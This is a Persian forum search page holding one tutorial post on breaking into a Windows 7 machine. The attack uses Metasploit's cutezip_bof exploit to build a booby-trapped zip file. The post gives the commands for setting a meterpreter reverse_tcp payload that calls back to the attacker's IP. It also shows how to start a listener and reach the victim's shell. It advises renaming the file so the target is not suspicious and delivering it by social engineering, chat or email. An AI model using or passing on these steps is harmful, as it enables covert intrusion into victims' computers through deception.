جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'دسترسی گرفتن از ویندوز 7'.
1 نتیجه پیدا شد
-
در این نوع حمله ما با استفاده از متااسپلویت اقدام به ایجاد یک فایل ورد با پسوند zip میکنیم و سپس این فایل رو از طرق مختلف مثل ( مهندسی اجتماعی – چت – ایمیل و . . . ) به تارگت میدهیم . بعد از اجرا و باز کردن فایل توسط تاگت ما موتوانیم از سیستم قربانی دسترسی بگیریم . خوب بریم سراغ اموزش اصلی : تارکت :Wing FTP 4.3.8 سیستم عامل حمله : بک ترک 5 یا کالی سیستم عامل تارگت : ویندوز 7 گام اول :در ابتدا وارد بک ترک بشید و یه ترمینال جدید باز کنید و دستور Msfconsole رو بنویسید و اینتر کنید ( البته میتونید از Armitage هم استفاده کنید . تفاوتی نداره ) . گام دوم : حالا با استفاده از دستور use exploit/windows/fileformat/cutezip_bof وارد محیط اکسپلویت بشید . گام سوم : در اینجا کافیه یه show options بگیرید تا بهتون بگه چه مقادیری رو باید ست کنید گام چهارم : مقادیر زیر را عینا ست کنید در صورت اینکه مثلا مشکل پیش اومد خودتون بنویسید msf exploit (cutezip_bof)>set payload windows/meterpreter/reverse_tcp msf exploit (cutezip_bof)>set lhost 192.168.1.2 msf exploit (cutezip_bof)>exploit در اینجا ایپی 192.168.1.2 همون ایپی هکر یا ایپی خودتون هست که باید جایگزین کنید . گام پنجم : بعد از اکسپلویت یک فایل با پسوند zip و نام msf در شاخه زیر ایجا میشود که باید این فایل رو تغییر نام بدید تا تارگت شک نکنه و متوجه حمله ما نشود . /root/.msf4/local/msf.zip و باعد با استفاده از دستورات زیر کامپیوتر خودمون رو اماده گرفتن اکسس از تارگت میکنیم . یه چیزی تو مایه های گوش ایستادن . use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.2 exploit در اخر هم فایل ایجاد شده در مرحله قبل را به هر طریقی که شده به تارگت میدیم تا اجرا کنه . ( چت – مهندسی اجتماعی – ایمیل و . . . ) . به محض باز کردن فایل توسط تارگت ما از سیستم تارگت شل میگیریم و میتونیم برای مرحله بعد حمله خودمون رو اماده کنیم . برای دسترسی به شل هم کافیه یک بار دستور Sessions -l رو وارد کنید . اگر شل گرفته باشید برای شما نشون میده . که یک ایدی هم داره سپس درستور Sessions -l رو به همراه ایدی وارد کنید تا به شل تارگت وصل بشید . به این ترتیب : با تشکر . شرکت امنیتی گاردایران ماهان (نفوذی) sessions -i ID
-
- اموزش نفوذ به ویندوز7
- نفوذ به ویندوز 7 توسط CuteZIP
- (و 7 مورد دیگر)